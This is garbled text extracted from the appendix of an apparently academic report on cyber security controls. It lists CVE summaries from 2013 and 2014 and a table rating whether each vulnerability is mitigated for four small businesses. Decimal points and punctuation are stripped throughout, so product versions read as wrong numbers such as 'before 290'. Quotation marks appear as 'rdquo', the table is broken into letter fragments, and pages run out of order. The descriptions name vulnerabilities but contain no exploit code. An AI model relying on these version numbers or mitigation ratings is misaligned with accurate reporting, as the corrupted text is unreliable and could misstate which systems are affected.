CVE-2014-1518Multiple unspecified vulnerabilities in thebrowser engine in Mozilla Firefox before290 Firefox ESR 24x before 245Thunderbird before 245 and SeaMonkeybefore 226 allow remote attackers to causea denial of service (memory corruptionand application crash) or possibly executearbitrary code via unknown vectors
CVE-2014-1563Use-after-free vulnerability in themozillaDOMSVGLengthGetTearOfffunction in Mozilla Firefox before 320Firefox ESR 31x before 311 andThunderbird 31x before 311 allows remoteattackers to execute arbitrary code orcause a denial of service (heap memorycorruption) via an SVG animation withDOM interaction that triggers incorrectcycle collection
CVE-2014-1565The mozilladomAudioEventTimelinefunction in the Web Audio APIimplementation in Mozilla Firefox before320 Firefox ESR 31x before 311 andThunderbird 31x before 311 does notproperly create audio timelines whichallows remote attackers to obtain sensitiveinformation from process memory or causea denial of service (out-of-bounds read) viacrafted API calls
CVE-2014-1586contentbasesrcnsDocumentcpp inMozilla Firefox before 330 Firefox ESR31x before 312 and Thunderbird 31xbefore 312 does not consider whetherWebRTC video sharing is occurring whichallows remote attackers to obtain sensitiveinformation from the local camera in certainIFRAME situations by maintaining a sessionafter the user temporarily navigates away
CVE-2014-1701
The GenerateFunction function inbindingsscriptscode generator v8pmin Blink as used in Google Chrome before3301750149 does not implement acertain cross-origin restriction for theEventTargetdispatchEvent functionwhich allows remote attackers to conductUniversal XSS (UXSS) attacks via vectorsinvolving events
CVE-2014-1740Multiple use-after-free vulnerabilities innetwebsocketswebsocket jobcc in theWebSockets implementation in GoogleChrome before 3401847137 allow remoteattackers to cause a denial of service orpossibly have unspecified other impact viavectors related to WebSocketJob deletion
CVE-2014-1744Integer overflow in the AudioInputRendererHostOnCreateStream functionin contentbrowserrendererhostmediaaudio input renderer hostccin Google Chrome before 3501916114allows remote attackers to cause a denial ofservice or possibly have unspecified otherimpact via vectors that trigger a largeshared-memory allocation
CVE-2014-1753rdquoMicrosoft Internet Explorer 6 through 9allows remote attackers to execute arbitrarycode or cause a denial of service (memorycorruption) via a crafted web site akardquordquoInternet Explorer Memory CorruptionVulnerabilityrdquordquordquo
CVE-2014-1806rdquoThe NET Remoting implementation inMicrosoft NET Framework 11 SP120 SP2 35 351 4 45 and451 does not properly restrict memoryaccess which allows remote attackers toexecute arbitrary code via vectors involvingmalformed objects aka rdquordquoTypeFilterLevelVulnerabilityrdquordquordquo
CVE-2014-1808rdquoMicrosoft Office 2013 Gold SP1 RTand RT SP1 allows remote attackers toobtain sensitive token information via aweb site that sends a crafted responseduring opening of an Office document akardquordquoToken Reuse Vulnerabilityrdquordquordquo
CVE-2014-1811rdquoThe TCP implementation in MicrosoftWindows Vista SP2 Windows Server2008 SP2 and R2 SP1 Windows 7 SP1Windows 8 Windows 81 Windows Server2012 Gold and R2 and Windows RTGold and 81 allows remote attackers tocause a denial of service (non-paged poolmemory consumption and system hang) viamalformed data in the Options field of aTCP header aka rdquordquoTCP Denial of ServiceVulnerabilityrdquordquordquo
CVE-2014-1812rdquoThe Group Policy implementation inMicrosoft Windows Vista SP2 WindowsServer 2008 SP2 and R2 SP1 Windows7 SP1 Windows 8 Windows 81 andWindows Server 2012 Gold and R2 does notproperly handle distribution of passwordswhich allows remote authenticated users toobtain sensitive credential information andconsequently gain privileges by leveragingaccess to the SYSVOL share as exploited inthe wild in May 2014 aka rdquordquoGroup PolicyPreferences Password Elevation of PrivilegeVulnerabilityrdquordquordquo
CVE-2014-2014imapsync before 1584 when running withthe ndashtls option attempts a cleartext loginwhen a certificate verification failure occurswhich allows remote attackers to obtaincredentials by sniffing the network
CVE-2014-2103Cisco Intrusion Prevention System (IPS)Software allows remote attackers to cause adenial of service (MainApp process outage)via malformed SNMP packets aka Bug IDsCSCum52355 and CSCul49309
CVE-2014-2109The TCP Input module in Cisco IOS122 through 124 and 150 through 154when NAT is used allows remote attackersto cause a denial of service (memoryconsumption or device reload) via craftedTCP packets aka Bug IDs CSCuh33843and CSCuj41494
CVE-2014-2364Multiple stack-based buffer overflows inAdvantech WebAccess before 72 allowremote attackers to execute arbitrary codevia a long string in the (1) ProjectName(2) SetParameter (3) NodeName(4) CCDParameter (5) SetColor (6)AlarmImage (7) GetParameter (8)GetColor (9) ServerResponse (10)SetBaud or (11) IPAddress parameterto an ActiveX control in (a) webvactocx(b) dvsocx or (c) webdactocx
CVE-2014-2416Unspecified vulnerability in the OracleData Integrator component in OracleFusion Middleware 111130 allows remoteattackers to affect availability via unknownvectors related to Data Quality a differentvulnerability than CVE-2014-2407 CVE-2014-2415 CVE-2014-2417 and CVE-2014-2418
CVE-2014-2554OTRS 31x before 3121 32x before3216 and 33x before 336 allows remoteattackers to conduct clickjacking attacks viaan IFRAME element
CVE-2014-2643Unspecified vulnerability in HP SystemsInsight Manager (SIM) before 74 allowsremote authenticated users to gainprivileges via unknown vectors
CVE-2014-2742rdquoIsode M-Link before 160v7 does notproperly restrict the processing ofcompressed XML elements which allowsremote attackers to cause a denial of service(resource consumption) via a crafted XMPPstream aka an rdquordquoxmppbombrdquordquo attackrdquo
CVE-2014-2768rdquoMicrosoft Internet Explorer 6 through 8allows remote attackers to execute arbitrarycode or cause a denial of service (memorycorruption) via a crafted web site akardquordquoInternet Explorer Memory CorruptionVulnerabilityrdquordquo a different vulnerabilitythan CVE-2014-2773rdquo
CVE-2014-2789rdquoMicrosoft Internet Explorer 8 through 11allows remote attackers to execute arbitrarycode or cause a denial of service (memorycorruption) via a crafted web site akardquordquoInternet Explorer Memory CorruptionVulnerabilityrdquordquo a different vulnerabilitythan CVE-2014-2795 CVE-2014-2798 andCVE-2014-2804rdquo
CYBER SECURITY CONTROLS EFFECTIVENESSmdash Security Lancaster Page 24 of 28
CVE-2014-2791rdquoMicrosoft Internet Explorer 9 allows remoteattackers to execute arbitrary code or causea denial of service (memory corruption) viaa crafted web site aka rdquordquoInternet ExplorerMemory Corruption Vulnerabilityrdquordquordquo
CVE-2014-2794rdquoMicrosoft Internet Explorer 6 and 7 allowsremote attackers to execute arbitrary codeor cause a denial of service (memorycorruption) via a crafted web site akardquordquoInternet Explorer Memory CorruptionVulnerabilityrdquordquo a different vulnerabilitythan CVE-2014-2788rdquo
CVE-2014-2808rdquoMicrosoft Internet Explorer 10 and 11allows remote attackers to execute arbitrarycode or cause a denial of service (memorycorruption) via a crafted web site akardquordquoInternet Explorer Memory CorruptionVulnerabilityrdquordquo a different vulnerabilitythan CVE-2014-2796 CVE-2014-2825CVE-2014-4050 CVE-2014-4055 and CVE-2014-4067rdquo
CVE-2014-2821rdquoMicrosoft Internet Explorer 8 and 9 allowsremote attackers to execute arbitrary codeor cause a denial of service (memorycorruption) via a crafted web site akardquordquoInternet Explorer Memory CorruptionVulnerabilityrdquordquordquo
CVE-2014-3444The GetGUID function in codecsdmp4dllin RealNetworks RealPlayer 160351 andearlier allows remote attackers to executearbitrary code or cause a denial of service(write access violation and applicationcrash) via a malformed 3gp file
CVE-2014-3489libutilmiq-passwordrb in Red HatCloudForms 30 Management Engine(CFME) before 5242 uses a hard-codedsalt which makes it easier for remoteattackers to guess passwords via a bruteforce attack
CVE-2014-3507Memory leak in d1 bothc in the DTLSimplementation in OpenSSL 098 before098zb 100 before 100n and 101before 101i allows remote attackersto cause a denial of service (memoryconsumption) via zero-length DTLSfragments that trigger improper handling ofthe return value of a certain insert function
CVE-2014-3556rdquoThe STARTTLS implementation inmailngx mail smtp handlerc in the SMTPproxy in nginx 15x and 16x before 161and 17x before 174 does not properlyrestrict IO buffering which allows man-in-the-middle attackers to insert commandsinto encrypted SMTP sessions by sending acleartext command that is processed afterTLS is in place related to a rdquordquoplaintextcommand injectionrdquordquo attack a similar issueto CVE-2011-0411rdquo
CVE-2014-3580The mod dav svn Apache HTTPD servermodule in Apache Subversion 1x before1719 and 18x before 1811 allows remoteattackers to cause a denial of service (NULLpointer dereference and server crash) via aREPORT request for a resource that doesnot exist
CVE-2014-3814
The Juniper Networks NetScreen Firewalldevices with ScreenOS before 63r17 whenconfigured to use the internal DNS lookupclient allows remote attackers to cause adenial of service (crash and reboot) viaa sequence of malformed packets to thedevice IP
CVE-2014-3819Juniper Junos 114 before 114R12 121before 121R10 121X44 before 121X44-D35 121X45 before 121X45-D25121X46 before 121X46-D20 121X47before 121X47-D10 122 before 122R8123 before 123R7 131 before 131R4132 before 132R4 133 before 133R2and 141 before 141R1 when Auto-RP isenabled allows remote attackers to causea denial of service (RDP routing processcrash and restart) via a malformed PIMpacket
CVE-2014-3872Multiple SQL injection vulnerabilities inthe administration login page in D-LinkDAP-1350 (Rev A1) with firmware114 and earlier allow remote attackers toexecute arbitrary SQL commands via the(1) username or (2) password
CVE-2014-4044OpenAFS 168 does not properly clear thefields in the host structure which allowsremote attackers to cause a denial of service(uninitialized memory access and crash)via unspecified vectors related to TMAYrequests
CVE-2014-4079rdquoMicrosoft Internet Explorer 6 through 11allows remote attackers to execute arbitrarycode or cause a denial of service (memorycorruption) via a crafted web site akardquordquoInternet Explorer Memory CorruptionVulnerabilityrdquordquo a different vulnerabilitythan CVE-2014-2799 CVE-2014-4059CVE-2014-4065 CVE-2014-4081 CVE-2014-4083 CVE-2014-4085 CVE-2014-4088 CVE-2014-4090 CVE-2014-4094CVE-2014-4097 CVE-2014-4100 CVE-2014-4103 CVE-2014-4104 CVE-2014-4105 CVE-2014-4106 CVE-2014-4107CVE-2014-4108 CVE-2014-4109 CVE-2014-4110 and CVE-2014-4111rdquo
CVE-2014-4082rdquoMicrosoft Internet Explorer 6 through 10allows remote attackers to execute arbitrarycode or cause a denial of service (memorycorruption) via a crafted web site akardquordquoInternet Explorer Memory CorruptionVulnerabilityrdquordquordquo
CVE-2014-4100rdquoMicrosoft Internet Explorer 6 through 11allows remote attackers to execute arbitrarycode or cause a denial of service (memorycorruption) via a crafted web site akardquordquoInternet Explorer Memory CorruptionVulnerabilityrdquordquo a different vulnerabilitythan CVE-2014-2799 CVE-2014-4059CVE-2014-4065 CVE-2014-4079 CVE-2014-4081 CVE-2014-4083 CVE-2014-4085 CVE-2014-4088 CVE-2014-4090CVE-2014-4094 CVE-2014-4097 CVE-2014-4103 CVE-2014-4104 CVE-2014-4105 CVE-2014-4106 CVE-2014-4107CVE-2014-4108 CVE-2014-4109 CVE-2014-4110 and CVE-2014-4111rdquo
CVE-2014-4105rdquoMicrosoft Internet Explorer 6 through 11allows remote attackers to execute arbitrarycode or cause a denial of service (memory
corruption) via a crafted web site akardquordquoInternet Explorer Memory CorruptionVulnerabilityrdquordquo a different vulnerabilitythan CVE-2014-2799 CVE-2014-4059CVE-2014-4065 CVE-2014-4079 CVE-2014-4081 CVE-2014-4083 CVE-2014-4085 CVE-2014-4088 CVE-2014-4090CVE-2014-4094 CVE-2014-4097 CVE-2014-4100 CVE-2014-4103 CVE-2014-4104 CVE-2014-4106 CVE-2014-4107CVE-2014-4108 CVE-2014-4109 CVE-2014-4110 and CVE-2014-4111rdquo
CVE-2014-4114rdquoMicrosoft Windows Vista SP2 WindowsServer 2008 SP2 and R2 SP1 Windows 7SP1 Windows 8 Windows 81 WindowsServer 2012 Gold and R2 and WindowsRT Gold and 81 allow remote attackersto execute arbitrary code via a craftedOLE object in an Office document asexploited in the wild with a rdquordquoSandwormrdquordquoattack in June through October 2014 akardquordquoWindows OLE Remote Code ExecutionVulnerabilityrdquordquordquo
CVE-2014-4127rdquoMicrosoft Internet Explorer 6 through 10allows remote attackers to execute arbitrarycode or cause a denial of service (memorycorruption) via a crafted web site akardquordquoInternet Explorer Memory CorruptionVulnerabilityrdquordquordquo
CVE-2014-4130rdquoMicrosoft Internet Explorer 11 allowsremote attackers to execute arbitrary codeor cause a denial of service (memorycorruption) via a crafted web site akardquordquoInternet Explorer Memory CorruptionVulnerabilityrdquordquo a different vulnerabilitythan CVE-2014-4132 and CVE-2014-4138rdquo
CVE-2014-4132rdquoMicrosoft Internet Explorer 11 allowsremote attackers to execute arbitrary codeor cause a denial of service (memorycorruption) via a crafted web site akardquordquoInternet Explorer Memory CorruptionVulnerabilityrdquordquo a different vulnerabilitythan CVE-2014-4130 and CVE-2014-4138rdquo
CVE-2014-4133rdquoMicrosoft Internet Explorer 6 and 7 allowsremote attackers to execute arbitrary codeor cause a denial of service (memorycorruption) via a crafted web site akardquordquoInternet Explorer Memory CorruptionVulnerabilityrdquordquo a different vulnerabilitythan CVE-2014-4137rdquo
CVE-2014-4141rdquoMicrosoft Internet Explorer 8 through 11allows remote attackers to execute arbitrarycode or cause a denial of service (memorycorruption) via a crafted web site akardquordquoInternet Explorer Memory CorruptionVulnerabilityrdquordquordquo
CVE-2014-4481Integer overflow in CoreGraphics in AppleiOS before 813 Apple OS X before10102 and Apple TV before 703 allowsremote attackers to execute arbitrary codeor cause a denial of service (applicationcrash) via a crafted PDF document
CVE-2014-4617The do uncompress function ing10compressc in GnuPG 1x before1417 and 2x before 2024 allows context-dependent attackers to cause a denialof service (infinite loop) via malformedcompressed packets as demonstrated by
CYBER SECURITY CONTROLS EFFECTIVENESSmdash Security Lancaster Page 25 of 28
an a3 01 5b ff byte sequence
CVE-2014-4631RSA Adaptive Authentication (On-Premise)6021 through 71 P3 when using devicebinding in a Challenge SOAP call orusing the RSA Adaptive AuthenticationIntegration Adapters with Out-of-BandPhone (Authentify) functionality conductspermanent device binding even whenauthentication fails which allows remoteattackers to bypass authentication
CVE-2014-5528The Appsflyer library for Android does notverify X509 certificates from SSL serverswhich allows man-in-the-middle attackersto spoof servers and obtain sensitiveinformation via a crafted certificate
CVE-2014-6040rdquoGNU C Library (aka glibc) before 220allows context-dependent attackers to causea denial of service (out-of-bounds readand crash) via a multibyte character valueof rdquordquo0xffffrdquordquo to the iconv function whenconverting (1) IBM933 (2) IBM935 (3)IBM937 (4) IBM939 or (5) IBM1364encoded data to UTF-8rdquo
CVE-2014-6105IBM Security Identity Manager 6x before6003 IF14 allows remote attackers toconduct clickjacking attacks via unspecifiedvectors
CVE-2014-6136IBM Security AppScan Standard 8x and 9xbefore 9011 FP1 supports unencryptedsessions which allows remote attackers toobtain sensitive information by sniffing thenetwork
CVE-2014-6164IBM WebSphere Application Server80x before 80010 and 85x before8554 allows remote attackers to spoofOpenID and OpenID Connect cookies andconsequently obtain sensitive informationvia a crafted URL
CVE-2014-6363rdquovbscriptdll in Microsoft VBScript 56through 58 as used with Internet Explorer6 through 11 and other products allowsremote attackers to execute arbitrarycode or cause a denial of service(memory corruption) via a crafted website aka rdquordquoVBScript Memory CorruptionVulnerabilityrdquordquordquo
CVE-2014-6369rdquoMicrosoft Internet Explorer 9 through 11allows remote attackers to execute arbitrarycode or cause a denial of service (memorycorruption) via a crafted web site akardquordquoInternet Explorer Memory CorruptionVulnerabilityrdquordquordquo
CVE-2014-6378Juniper Junos 114 before R12-S4 121X44before D35 121X45 before D30 121X46before D25 121X47 before D10 122before R9 122X50 before D70 123 beforeR7 131 before R4 before S3 131X49before D55 131X50 before D30 132before R5 132X50 before D20 132X51before D26 and D30 132X52 before D15133 before R3 and 141 before R1 allowsremote attackers to cause a denial of service(router protocol daemon crash) via a craftedRSVP PATH message
CVE-2014-6487Unspecified vulnerability in the OracleIdentity Manager component in OracleFusion Middleware 11115 1111711121 and 11122 allows remoteauthenticated users to affect integrity viaunknown vectors related to End User SelfService
CVE-2014-7250The TCP stack in 43BSD Net2 as usedin FreeBSD 54 NetBSD possibly 20 andOpenBSD possibly 36 does not properlyimplement the session timer which allowsremote attackers to cause a denial of service(resource consumption) via crafted packets
CVE-2014-7927The SimplifiedLoweringDoLoadBufferfunction in compilersimplified-loweringccin Google V8 as used in Google Chromebefore 400221491 does not properlychoose an integer data type which allowsremote attackers to cause a denial ofservice (memory corruption) or possiblyhave unspecified other impact via craftedJavaScript code
CVE-2014-7945OpenJPEG before r2908 as used inPDFium in Google Chrome before400221491 allows remote attackersto cause a denial of service (out-of-boundsread) via a crafted PDF document relatedto j2kc jp2c and t2c
CVE-2014-8447Adobe Reader and Acrobat 10x before10113 and 11x before 11010 on Windows
and OS X allow attackers to executearbitrary code or cause a denial of service(memory corruption) via unspecified vectorsa different vulnerability than CVE-2014-8445 CVE-2014-8446 CVE-2014-8456CVE-2014-8458 CVE-2014-8459 CVE-2014-8461 and CVE-2014-9158
CVE-2014-8638The navigatorsendBeacon implementationin Mozilla Firefox before 350 FirefoxESR 31x before 314 Thunderbird before314 and SeaMonkey before 232 omitsthe CORS Origin header which allowsremote attackers to bypass intended CORSaccess-control checks and conduct cross-site request forgery (CSRF) attacks via acrafted web site
CVE-2014-8835rdquoThe xpc data get bytes function in libxpcin Apple OS X before 10102 does not verifythat a dictionaryrsquos Attributes key has thexpc data data type which allows attackersto execute arbitrary code by providing acrafted dictionary to sysmond related toan rdquordquoXPC type confusionrdquordquo issuerdquo
CVE-2014-9159Heap-based buffer overflow in AdobeReader and Acrobat 10x before 10113and 11x before 11010 on Windows andOS X allows attackers to execute arbitrarycode via unspecified vectors a differentvulnerability than CVE-2014-8457 and CVE-2014-8460
CVE-2014-9163Stack-based buffer overflow in Adobe FlashPlayer before 1300259 and 14x and 15xbefore 1500246 on Windows and OS Xand before 112202425 on Linux allowsattackers to execute arbitrary code viaunspecified vectors as exploited in the wildin December 2014
CVE-2014-9350rdquoTP-Link TL-WR740N 4 with firmware3170 Build 140520 3166 Build 130529and 3164 Build 130205 allows remoteattackers to cause a denial of service(httpd crash) via vectors involving ardquordquonewrdquordquo value in the isNew parameter toPingIframeRpmhtmrdquo
CVE-2014-9357Docker 132 allows remote attackers toexecute arbitrary code with root privilegesvia a crafted (1) image or (2) build in aDockerfile in an LZMA (xz) archive relatedto the chroot for archive extraction
CYBER SECURITY CONTROLS EFFECTIVENESSmdash Security Lancaster Page 26 of 28
Survey Responses
CYBER SECURITY CONTROLS EFFECTIVENESSmdash Security Lancaster Page 27 of 28
CYBER SECURITY CONTROLS EFFECTIVENESSmdash Security Lancaster Page 28 of 28
CV
ES
ME
1S
ME
2S
ME
3S
ME
4Id
ealis
edN
oC
EW
ith
CE
CV
E-2
01
3-2
35
0n
yn
ny
No
tM
itig
ated
Par
tial
lyM
itig
ated
-P
atch
Man
agem
ent
ampF
irew
all
CV
E-2
01
3-2
49
2y
ny
nn
No
tM
itig
ated
Mit
igat
ed-
Fir
ewal
lS
ecu
reC
on
fig
ura
tio
n
Pat
chM
anag
emen
tC
VE
-20
13
-25
07
yn
nn
nN
ot
Mit
igat
edP
arti
ally
Mit
igat
ed-
Fir
mw
are
Man
agem
ent
An
ti-M
alw
are
CV
E-2
01
3-2
73
6y
yy
yy
No
tM
itig
ated
Par
tial
lyM
itig
ated
-P
atch
Man
agem
ent
CV
E-2
01
3-2
78
0n
nn
nn
No
tM
itig
ated
Mit
igat
ed-
Fir
ewal
lS
ecu
reC
on
fig
ura
tio
n
Pat
chM
anag
emen
tC
VE
-20
13
-28
03
nn
nn
nN
ot
Mit
igat
edM
itig
ated
-S
tro
ng
Pas
swor
ds
Pat
chM
anag
emen
tsC
VE
-20
13
-28
24
nn
nn
nN
ot
Mit
igat
edM
itig
ated
-F
irew
all
Sec
ure
Co
nfi
gu
rati
on
P
atch
Man
agem
ent
CV
E-2
01
3-2
82
6n
nn
nn
No
tM
itig
ated
Mit
igat
ed-
Fir
ewal
lS
ecu
reC
on
fig
ura
tio
n
Pat
chM
anag
emen
tC
VE
-20
13
-29
20
ny
yy
yN
ot
Mit
igat
edP
arti
ally
Mit
igat
ed-
Pat
chM
anag
emen
tC
VE
-20
13
-30
64
yn
nn
nN
ot
Mit
igat
edM
itig
ated
-P
atch
Man
agem
ent
Sec
ure
Co
nfi
gu
rati
on
(Sec
ure
Bro
wse
r)
Web
site
Bla
cklis
tin
gC
VE
-20
13
-31
16
yn
yy
nN
ot
Mit
igat
edM
itig
ated
-P
atch
Man
agem
ent
Sec
ure
Co
nfi
gu
rati
on
(Sec
ure
Bro
wse
r)
Web
site
Bla
cklis
tin
gC
VE
-20
13
-31
37
yy
yy
nN
ot
Mit
igat
edM
itig
ated
-A
nti
-Mal
war
eS
ecu
reC
on
fig
ura
tio
n(D
on
rsquotIn
stal
l)C
VE
-20
13
-31
94
yn
yy
nN
ot
Mit
igat
edM
itig
ated
-P
atch
Man
agem
ent
Sec
ure
Co
nfi
gu
rati
on
(Sec
ure
Bro
wse
r)
Web
site
Bla
cklis
tin
gC
VE
-20
13
-31
99
yn
yy
yN
ot
Mit
igat
edM
itig
ated
-P
atch
Man
agem
ent
Sec
ure
Co
nfi
gu
rati
on
(Sec
ure
Bro
wse
r)
Web
site
Bla
cklis
tin
gC
VE
-20
13
-32
01
yn
yy
yN
ot
Mit
igat
edM
itig
ated
-P
atch
Man
agem
ent
Sec
ure
Co
nfi
gu
rati
on
(Sec
ure
Bro
wse
r)
Web
site
Bla
cklis
tin
gC
VE
-20
13
-32
06
yn
yy
nN
ot
Mit
igat
edM
itig
ated
-P
atch
Man
agem
ent
Sec
ure
Co
nfi
gu
rati
on
(Sec
ure
Bro
wse
r)
Web
site
Bla
cklis
tin
gC
VE
-20
13
-32
80
nn
nn
nN
ot
Mit
igat
edP
arti
ally
Mit
igat
ed-
Pat
chM
anag
emen
tamp
Sec
ure
Co
nfi
gu
rati
on
CV
E-2
01
3-3
38
7n
nn
nn
No
tM
itig
ated
Mit
igat
ed-
Fir
ewal
lS
ecu
reC
on
fig
ura
tio
n
Pat
chM
anag
emen
tC
VE
-20
13
-34
17
nn
nn
nN
ot
Mit
igat
edM
itig
ated
-S
ecu
reC
on
fig
ura
tio
n(S
ecu
reB
row
ser)
W
ebsi
teB
lack
listi
ng
CV
E-2
01
3-3
63
2y
yy
nn
No
tM
itig
ated
Mit
igat
ed-
Acc
ess
Po
licy
(Str
on
gP
assw
ord
)F
irew
all
CV
E-2
01
3-3
65
6n
nn
nn
No
tM
itig
ated
Par
tial
lyM
itig
ated
-P
atch
Man
agem
ent
CV
E-2
01
3-3
85
6y
yy
yy
No
tM
itig
ated
Mit
igat
ed-
Pat
chM
anag
emen
tF
irew
all
An
ti-M
alw
are
CV
E-2
01
3-3
86
0y
yy
yy
No
tM
itig
ated
Par
tial
lyM
itig
ated
-P
atch
Man
agem
ent
CV
E-2
01
3-3
89
3y
ny
yn
No
tM
itig
ated
Mit
igat
ed-
Pat
chM
anag
emen
tS
ecu
reC
on
fig
ura
tio
n-
no
JS
CV
E-2
01
3-3
89
7y
ny
yn
No
tM
itig
ated
Mit
igat
ed-
Sec
ure
Co
nfi
gu
rati
on
(Sec
ure
Bro
wse
r)
Web
site
Bla
cklis
tin
gC
VE
-20
13
-39
00
yy
yy
yN
ot
Mit
igat
edM
itig
ated
-F
irew
all
Sec
ure
Co
nfi
gu
rati
on
P
atch
Man
agem
ent
CV
E-2
01
3-3
90
5y
yn
yn
No
tM
itig
ated
No
tM
itig
ated
-S
ecu
reC
on
fig
ura
tio
n(D
on
rsquotin
stal
l)C
VE
-20
13
-42
23
yn
nn
nN
ot
Mit
igat
edN
ot
Mit
igat
ed-
Sec
ure
Co
nfi
gu
rati
on
(Do
nrsquot
inst
all)
CV
E-2
01
3-4
43
6n
nn
nn
No
tM
itig
ated
Mit
igat
ed-
Sec
ure
Co
nfi
gu
rati
on
P
atch
Man
agem
ent
CV
E-2
01
3-4
47
8n
nn
nn
No
tM
itig
ated
Mit
igat
ed-
Pat
chM
anag
emen
tS
ecu
reC
on
fig
ura
tio
nC
VE
-20
13
-45
29
nn
nn
nN
ot
Mit
igat
edP
arti
ally
Mit
igat
ed-
Pat
chM
anag
emen
tC
VE
-20
13
-45
55
yn
yy
nN
ot
Mit
igat
edP
arti
ally
Mit
igat
ed-
Pat
chM
anag
emen
tC
VE
-20
13
-47
76
yn
nn
nN
ot
Mit
igat
edM
itig
ated
-F
irew
all
Sec
ure
Co
nfi
gu
rati
on
P
atch
Man
agem
ent
CV
E-2
01
3-4
78
2n
nn
nn
No
tM
itig
ated
No
tM
itig
ated
-S
ecu
reC
on
fig
ura
tio
n(D
on
rsquotin
stal
l)C
VE
-20
13
-50
57
yy
yy
yN
ot
Mit
igat
edP
arti
ally
Mit
igat
ed-
Pat
chM
anag
emen
tS
ecu
reC
on
fig
ura
tio
n(S
ecu
reB
row
ser)
W
ebsi
teB
lack
listi
ng
CV
E-2
01
3-5
36
9n
nn
nn
No
tM
itig
ated
Par
tial
lyM
itig
ated
-P
atch
Man
agem
ent
ampS
ecu
reC
on
fig
ura
tio
nC
VE
-20
13
-54
28
nn
nn
nN
ot
Mit
igat
edP
arti
ally
Mit
igat
ed-
Pat
chM
anag
emen
tC
VE
-20
13
-54
31
nn
nn
nN
ot
Mit
igat
edM
itig
ated
-P
atch
Man
agem
ent
Sec
ure
Co
nfi
gu
rati
on
(Sec
ure
Bro
wse
r)
Web
site
Bla
cklis
tin
gC
VE
-20
13
-54
94
nn
nn
nN
ot
Mit
igat
edN
ot
Mit
igat
ed-
Sec
ure
Co
nfi
gu
rati
on
CV
E-2
01
3-5
50
7n
nn
nn
No
tM
itig
ated
Mit
igat
ed-
Fir
ewal
lP
atch
Man
agem
ent
CV
E-2
01
3-5
53
6n
nn
nn
No
tM
itig
ated
Mit
igat
ed-
Fir
ewal
lP
atch
Man
agem
ent
CV
E-2
01
3-5
55
9n
nn
nn
No
tM
itig
ated
Mit
igat
ed-
Pat
chM
anag
emen
tS
ecu
reC
on
fig
ura
tio
n(S
ecu
reB
row
ser)
W
ebsi
teB
lack
listi
ng
CV
E-2
01
3-5
56
1n
nn
nn
No
tM
itig
ated
No
tM
itig
ated
-S
ecu
reC
on
fig
ura
tio
nC
VE
-20
13
-57
51
nn
nn
nN
ot
Mit
igat
edP
arti
ally
Mit
igat
ed-
Pat
chM
anag
emen
tamp
Sec
ure
Co
nfi
gu
rati
on
CV
E-2
01
3-5
75
7n
nn
nm
No
tM
itig
ated
Mit
igat
ed-
Fir
ewal
lC
VE
-20
13
-58
28
nn
nn
nN
ot
Mit
igat
edP
arti
ally
Mit
igat
ed-
Pat
chM
anag
emen
t
CYBER SECURITY CONTROLS EFFECTIVENESSmdash Security Lancaster Page 15 of 28
CV
ES
ME
1S
ME
2S
ME
3S
ME
4Id
ealis
edN
oC
EW
ith
CE
CV
E-2
01
3-6
16
7y
yy
yy
No
tM
itig
ated
Mit
igat
ed-
Pat
chM
anag
emen
tA
cces
sC
on
tro
lS
ecu
reC
on
fig
ura
tio
n(C
oo
kie-
del
etio
n)
CV
E-2
01
3-6
18
8y
yn
nn
No
tM
itig
ated
Par
tial
lyM
itig
ated
-P
atch
Man
agem
ent
Sec
ure
Co
nfi
gu
rati
on
(Sec
ure
Bro
wse
r)
Web
site
Bla
cklis
tin
gC
VE
-20
13
-62
84
nn
nn
nN
ot
Mit
igat
edN
ot
Mit
igat
ed-
Sec
ure
Co
nfi
gu
rati
on
(Do
nrsquot
inst
all)
CV
E-2
01
3-6
39
6n
nn
nn
No
tM
itig
ated
Mit
igat
ed-
Pat
chM
anag
emen
tS
ecu
reC
on
fig
ura
tio
n(S
ecu
reS
erve
r)C
VE
-20
13
-64
75
ny
yn
nN
ot
Mit
igat
edM
itig
ated
-A
nti
-Mal
war
eF
irew
all
Pat
chM
anag
emen
tC
VE
-20
13
-66
60
yy
yy
yN
ot
Mit
igat
edM
itig
ated
-P
atch
Man
agem
ent
Sec
ure
Co
nfi
gu
rati
on
(Sec
ure
Bro
wse
r)
Web
site
Bla
cklis
tin
gC
VE
-20
13
-66
99
nn
nn
nN
ot
Mit
igat
edM
itig
ated
-F
irew
all
Sec
ure
Co
nfi
gu
rati
on
CV
E-2
01
3-6
70
2n
nn
nn
No
tM
itig
ated
Mit
igat
ed-
Fir
ewal
lP
atch
Man
agem
ent
CV
E-2
01
3-6
97
9n
nn
nn
No
tM
itig
ated
Par
tial
lyM
itig
ated
-P
atch
Man
agem
ent
CV
E-2
01
3-6
99
4n
ny
nn
No
tM
itig
ated
Mit
igat
ed-
Sec
ure
Co
nfi
gu
rati
on
P
atch
Man
agem
ent
CV
E-2
01
3-7
00
4y
nn
yn
No
tM
itig
ated
Mit
igat
ed-
Fir
ewal
lS
ecu
reC
on
fig
ura
tio
n
Fir
mw
are
Man
agem
ent
CV
E-2
01
3-7
04
3n
nn
yn
No
tM
itig
ated
Par
tial
lyM
itig
ated
-F
irm
war
eM
anag
emen
tC
VE
-20
13
-73
89
yn
ny
yN
ot
Mit
igat
edM
itig
ated
-F
irew
all
Sec
ure
Co
nfi
gu
rati
on
F
irm
war
eM
anag
emen
tC
VE
-20
14
-00
01
yn
yn
nN
ot
Mit
igat
edM
itig
ated
-B
ou
nd
ary
Fir
ewal
lsin
clu
de
anti
-DO
SC
VE
-20
14
-00
35
nn
yn
nN
ot
Mit
igat
edM
itig
ated
-P
atch
Man
agem
ent
ampS
SL
CV
E-2
01
4-0
16
0y
yy
yy
No
tM
itig
ated
Par
tial
lyM
itig
ated
-P
atch
Man
agem
ent
CV
E-2
01
4-0
20
7n
nn
nn
No
tM
itig
ated
Mit
igat
ed-
Pat
chM
anag
emen
tamp
SS
LC
VE
-20
14
-02
32
yy
yn
nN
ot
Mit
igat
edM
itig
ated
-S
ecu
reC
on
fig
ura
tio
n
Pat
chM
anag
emen
tC
VE
-20
14
-02
59
yy
yy
yN
ot
Mit
igat
edM
itig
ated
-M
alw
are
Pro
tect
ion
ampP
atch
Man
agem
ent
CV
E-2
01
4-0
26
6y
yy
ny
No
tM
itig
ated
Par
tial
lyM
itig
ated
-S
ecu
reC
on
fig
ura
tio
n(S
ecu
reB
row
ser)
W
ebsi
teB
lack
listi
ng
CV
E-2
01
4-0
29
4n
ny
ny
No
tM
itig
ated
Mit
igat
ed-
Sec
ure
Co
nfi
gu
rati
on
A
nti
-Mal
war
eC
VE
-20
14
-03
13
yn
yy
nN
ot
Mit
igat
edP
arti
ally
Mit
igat
ed-
Sec
